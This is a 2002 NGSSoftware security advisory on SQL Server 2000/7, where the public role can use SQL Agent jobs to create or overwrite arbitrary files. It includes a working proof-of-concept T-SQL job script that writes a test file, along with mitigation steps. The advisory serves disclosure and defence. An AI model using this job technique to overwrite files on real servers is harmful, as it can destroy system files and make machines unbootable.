Arbitrary File Creation/Overwrite with SQL Agent Jobs

August 19th, 2002

NGSSoftware Insight Security Research Advisory

Name: Arbitrary File Creation/Overwrite with SQL Agent Jobs

Systems: Microsoft SQL Server 2000 and 7

Severity: High Risk

Category: Arbitrary File Creation/Overwrite

Vendor URL: http://www.microsoft.com/

Author: David Litchfield (david@ngssoftware.com)

Advisory URL: http://www.ngssoftware.com/advisories/mssql-espjobs2.txt

Date: 19th August 2002

Advisory number: #NISR19002002A

Description

***********

With Microsoft SQL Server 2000 and 7 comes a “helper” service, the SQL

Server agent. The Agent is responsible for restarting  the database service

if it stops for some reason, has a role to play in replication and runs

scheduled jobs. As the public role can submit jobs to the SQL Agent, by

default, a low pirviliged user can create or overwrite arbitray files on the

SQL Server.

Details

*******

When adding a job one can specify the name of a file to output the results

of the Transact-SQL or CmdExec Job to. If this already exists it can be

ovewritten and if it doesn’t exist already a new file will be created. By

crafting the query of the job one can place arbitrary contents in this file.

If the SQL Server Agent is running with Local SYSTEM privileges an attacker

will be able to overwrite key operating system files rendering the server

unbootable.

Proof of Concept

****************

– ArbitraryFileCreate

– For this to work the SQL Agent should be running.

– Further, you’ll need to change SERVER_NAME in

– sp_add_jobserver to the SQL Server of your choice

– David Litchfield

– (david@ngssoftware.com)

– 19th August 2002

USE msdb

EXEC sp_add_job @job_name = ‘ArbitraryFileCreate’,

@enabled = 1,

@description = ‘This will create a file called c:\sqlafc123.txt’,

@delete_level = 1

EXEC sp_add_jobstep @job_name = ‘ArbitraryFileCreate’,

@step_name = ‘SQLAFC’,

@subsystem = ‘TSQL’,

@command = ’select ‘’hello, this file was created by the SQL Agent.”’,

@output_file_name = ‘c:\sqlafc123.txt’

EXEC sp_add_jobserver @job_name = ‘ArbitraryFileCreate’,

@server_name = ‘SERVER_NAME’

EXEC sp_start_job @job_name = ‘ArbitraryFileCreate’

Fix Information

***************

NGSSoftware informed Microsoft of these issues in July. To prevent low

privileged users from submitting jobs one should disallow public access to

the Job related stored procedures in the MSDB database particularly

sp_add_job

sp_add_jobstep

sp_add_jobserver

sp_start_job

Further to this ensure that the SQL Server Agent is running as a low

privileged NT account.

Section Navigation


SC Awards 2008


SC Magazine Awards 2008

NGSSoftware wins 'Best Security Company'.

ITA 2008


2008 International Trade Awards

NGSSoftware named as South-East England regional winners at the 2008 International Trade Awards.

SLBA 2008


South London Business Awards 2008

David Litchfield named as 'Entrepreneur of the Year' at the South London Business Awards 2008.

Latest Vacancies

Experienced CLAS consultant

NGSSoftware are seeking an experienced CLAS consultant capable of writing Security Targets and Evaluation Work Plans for CTAS.

Please send us your CV or resume.

NGS Offices

NGS have offices located in London & St Andrews (UK) and Sydney (Australia).

NGS Consulting

Why do companies around the world – and around the corner – turn to NGS?

Discover what we could do for your business »

NGS Security Training

Find out why we have provided training to some of the world's most security conscious organisations.

Learn from the best!

Speaking Events

We regularly present and speak at international security conferences throughout the world.

OWASP AppSec Europe 2008

AusCERT 2008

ITWeb Security Summit

Customer Testimonials

Read what some of our satisfied customers are saying about us.

NGS Publications

Web Application Hacker's Handbook

Oracle Hacker's Handbook

Database Hacker's Handbook

The Shellcoder's Handbook

SQL Server Security

Configuring IPCop Firewalls


CHECK